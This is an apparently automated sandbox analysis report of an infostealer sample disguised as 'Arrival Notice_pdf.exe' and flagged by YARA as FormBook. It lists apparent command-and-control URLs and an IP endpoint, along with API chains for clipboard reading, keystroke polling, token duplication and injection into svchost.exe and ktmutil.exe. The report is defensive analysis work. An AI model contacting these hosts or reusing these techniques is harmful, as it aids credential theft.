Source: FMQUqumqqHn.exe, 00000008.00000002.3009849528.0000000004F69000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.migorengya8.click/y3dc/
Source: ktmutil.exe, 00000007.00000002.3009265180.0000000004594000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000007.00000002.3010819825.00000000069A0000.00000004.00000800.00020000.00000000.sdmp, FMQUqumqqHn.exe, 00000008.00000002.3008268012.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2439887561.00000000388F4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://34.92.79.175:19817/register
Source: ktmutil.exe, 00000007.00000002.3010903578.00000000083EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ktmutil.exe, 00000007.00000002.3010903578.00000000083EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ktmutil.exe, 00000007.00000002.3010903578.00000000083EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ktmutil.exe, 00000007.00000002.3010903578.00000000083EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ktmutil.exe, 00000007.00000002.3010903578.00000000083EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ktmutil.exe, 00000007.00000002.3010903578.00000000083EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ktmutil.exe, 00000007.00000002.3010903578.00000000083EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ktmutil.exe, 00000007.00000002.3009265180.0000000004594000.00000004.10000000.00040000.00000000.sdmp, FMQUqumqqHn.exe, 00000008.00000002.3008268012.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2439887561.00000000388F4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?874f82fc659e5acd8a958bbf89041d1f
Source: ktmutil.exe, 00000007.00000002.3006642463.0000000003586000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ktmutil.exe, 00000007.00000002.3006642463.0000000003586000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: ktmutil.exe, 00000007.00000002.3006642463.0000000003586000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: ktmutil.exe, 00000007.00000002.3006642463.000000000355D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: ktmutil.exe, 00000007.00000002.3006642463.000000000355D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: ktmutil.exe, 00000007.00000003.2305976215.00000000083C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: ktmutil.exe, 00000007.00000002.3010903578.00000000083EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_00296B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00296B0C

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_00296D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00296D07

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

0_2_00296B0C

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_00282B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00282B37

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_002AF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_002AF7FF

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3007895884.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2109435609.00000000039B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3007811808.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2109156869.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3006361628.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3009849528.0000000004F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3007851099.00000000029A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2109766893.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00243D19
Source: Arrival Notice_pdf.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Arrival Notice_pdf.exe, 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_3cc27fe0-2
Source: Arrival Notice_pdf.exe, 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: 'SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_6f52cfca-5
Source: Arrival Notice_pdf.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_da115513-d
Source: Arrival Notice_pdf.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_970a86b2-f

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: Arrival Notice_pdf.exe
Source: initial sample	Static PE information: Filename: Arrival Notice_pdf.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042C883 NtClose,	1_2_0042C883
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72B60 NtClose,LdrInitializeThunk,	1_2_03B72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03B72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_03B72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B735C0 NtCreateMutant,LdrInitializeThunk,	1_2_03B735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B74340 NtSetContextThread,	1_2_03B74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B74650 NtSuspendThread,	1_2_03B74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72BA0 NtEnumerateValueKey,	1_2_03B72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72B80 NtQueryInformationFile,	1_2_03B72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72BF0 NtAllocateVirtualMemory,	1_2_03B72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72BE0 NtQueryValueKey,	1_2_03B72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72AB0 NtWaitForSingleObject,	1_2_03B72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72AF0 NtWriteFile,	1_2_03B72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72AD0 NtReadFile,	1_2_03B72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72FB0 NtResumeThread,	1_2_03B72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72FA0 NtQuerySection,	1_2_03B72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72F90 NtProtectVirtualMemory,	1_2_03B72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72FE0 NtCreateFile,	1_2_03B72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72F30 NtCreateSection,	1_2_03B72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72F60 NtCreateProcessEx,	1_2_03B72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72EA0 NtAdjustPrivilegesToken,	1_2_03B72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72E80 NtReadVirtualMemory,	1_2_03B72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72EE0 NtQueueApcThread,	1_2_03B72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72E30 NtWriteVirtualMemory,	1_2_03B72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72DB0 NtEnumerateKey,	1_2_03B72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72DD0 NtDelayExecution,	1_2_03B72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72D30 NtUnmapViewOfSection,	1_2_03B72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72D10 NtMapViewOfSection,	1_2_03B72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72D00 NtSetInformationFile,	1_2_03B72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72CA0 NtQueryInformationToken,	1_2_03B72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72CF0 NtOpenProcess,	1_2_03B72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72CC0 NtQueryVirtualMemory,	1_2_03B72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72C00 NtQueryInformationProcess,	1_2_03B72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72C60 NtCreateKey,	1_2_03B72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B73090 NtSetValueKey,	1_2_03B73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B73010 NtOpenDirectoryObject,	1_2_03B73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B739B0 NtGetContextThread,	1_2_03B739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B73D10 NtOpenProcessToken,	1_2_03B73D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B73D70 NtOpenThread,	1_2_03B73D70
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF4340 NtSetContextThread,LdrInitializeThunk,	7_2_03BF4340
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF4650 NtSuspendThread,LdrInitializeThunk,	7_2_03BF4650
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2BA0 NtEnumerateValueKey,LdrInitializeThunk,	7_2_03BF2BA0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_03BF2BF0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_03BF2BE0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2B60 NtClose,LdrInitializeThunk,	7_2_03BF2B60
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2AF0 NtWriteFile,LdrInitializeThunk,	7_2_03BF2AF0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2AD0 NtReadFile,LdrInitializeThunk,	7_2_03BF2AD0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2FB0 NtResumeThread,LdrInitializeThunk,	7_2_03BF2FB0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2FE0 NtCreateFile,LdrInitializeThunk,	7_2_03BF2FE0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2F30 NtCreateSection,LdrInitializeThunk,	7_2_03BF2F30
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2E80 NtReadVirtualMemory,LdrInitializeThunk,	7_2_03BF2E80
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2EE0 NtQueueApcThread,LdrInitializeThunk,	7_2_03BF2EE0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_03BF2DF0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2DD0 NtDelayExecution,LdrInitializeThunk,	7_2_03BF2DD0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2D30 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_03BF2D30
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_03BF2D10
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_03BF2CA0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_03BF2C70
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2C60 NtCreateKey,LdrInitializeThunk,	7_2_03BF2C60
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF35C0 NtCreateMutant,LdrInitializeThunk,	7_2_03BF35C0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF39B0 NtGetContextThread,LdrInitializeThunk,	7_2_03BF39B0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2B80 NtQueryInformationFile,	7_2_03BF2B80
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2AB0 NtWaitForSingleObject,	7_2_03BF2AB0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2FA0 NtQuerySection,	7_2_03BF2FA0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2F90 NtProtectVirtualMemory,	7_2_03BF2F90
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2F60 NtCreateProcessEx,	7_2_03BF2F60
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2EA0 NtAdjustPrivilegesToken,	7_2_03BF2EA0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2E30 NtWriteVirtualMemory,	7_2_03BF2E30
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2DB0 NtEnumerateKey,	7_2_03BF2DB0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2D00 NtSetInformationFile,	7_2_03BF2D00
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2CF0 NtOpenProcess,	7_2_03BF2CF0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2CC0 NtQueryVirtualMemory,	7_2_03BF2CC0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF2C00 NtQueryInformationProcess,	7_2_03BF2C00
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF3090 NtSetValueKey,	7_2_03BF3090
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF3010 NtOpenDirectoryObject,	7_2_03BF3010
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF3D10 NtOpenProcessToken,	7_2_03BF3D10
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF3D70 NtOpenThread,	7_2_03BF3D70
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_032C93F0 NtReadFile,	7_2_032C93F0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_032C9280 NtCreateFile,	7_2_032C9280
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_032C9700 NtAllocateVirtualMemory,	7_2_032C9700
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_032C95A0 NtClose,	7_2_032C95A0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_032C94F0 NtDeleteFile,	7_2_032C94F0

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_00286606: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00286606

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_0027ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_0027ACC5

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_002879D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_002879D3

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0026B043	0_2_0026B043
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00253200	0_2_00253200
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00253B70	0_2_00253B70
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0027410F	0_2_0027410F
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_002602A4	0_2_002602A4
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0024E3B0	0_2_0024E3B0
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0027038E	0_2_0027038E
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0027467F	0_2_0027467F
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_002606D9	0_2_002606D9
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_002AAACE	0_2_002AAACE
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00274BEF	0_2_00274BEF
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0026CCC1	0_2_0026CCC1
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00246F07	0_2_00246F07
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0024AF50	0_2_0024AF50
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0025B11F	0_2_0025B11F
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_002A31BC	0_2_002A31BC
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0026D1B9	0_2_0026D1B9
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0026123A	0_2_0026123A
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0027724D	0_2_0027724D
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_002493F0	0_2_002493F0
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_002813CA	0_2_002813CA
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0025F563	0_2_0025F563
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_002496C0	0_2_002496C0
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0028B6CC	0_2_0028B6CC
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_002477B0	0_2_002477B0
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_002AF7FF	0_2_002AF7FF
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_002779C9	0_2_002779C9
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0025FA57	0_2_0025FA57
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00249B60	0_2_00249B60
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00247D19	0_2_00247D19
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0025FE6F	0_2_0025FE6F
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00269ED0	0_2_00269ED0
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00247FA3	0_2_00247FA3
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00D09690	0_2_00D09690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004188F3	1_2_004188F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403060	1_2_00403060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004010C0	1_2_004010C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004101CA	1_2_004101CA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004101D3	1_2_004101D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401200	1_2_00401200
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040235D	1_2_0040235D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402360	1_2_00402360
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416B33	1_2_00416B33
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004103F3	1_2_004103F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402B95	1_2_00402B95
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402BA0	1_2_00402BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E46B	1_2_0040E46B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E473	1_2_0040E473
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042EEA3	1_2_0042EEA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C003E6	1_2_03C003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E3F0	1_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFA352	1_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC02C0	1_2_03BC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF41A2	1_2_03BF41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C001AA	1_2_03C001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF81CC	1_2_03BF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDA118	1_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30100	1_2_03B30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC8158	1_2_03BC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD2000	1_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3C7C0	1_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B64750	1_2_03B64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5C6E0	1_2_03B5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C00591	1_2_03C00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40535	1_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEE4F6	1_2_03BEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE4420	1_2_03BE4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF2446	1_2_03BF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF6BD7	1_2_03BF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFAB40	1_2_03BFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C0A9A6	1_2_03C0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B56962	1_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B268B8	1_2_03B268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E8F0	1_2_03B6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4A840	1_2_03B4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B42840	1_2_03B42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBEFA0	1_2_03BBEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B32FC8	1_2_03B32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B60F30	1_2_03B60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE2F30	1_2_03BE2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B82F28	1_2_03B82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB4F40	1_2_03BB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B52E90	1_2_03B52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFCE93	1_2_03BFCE93
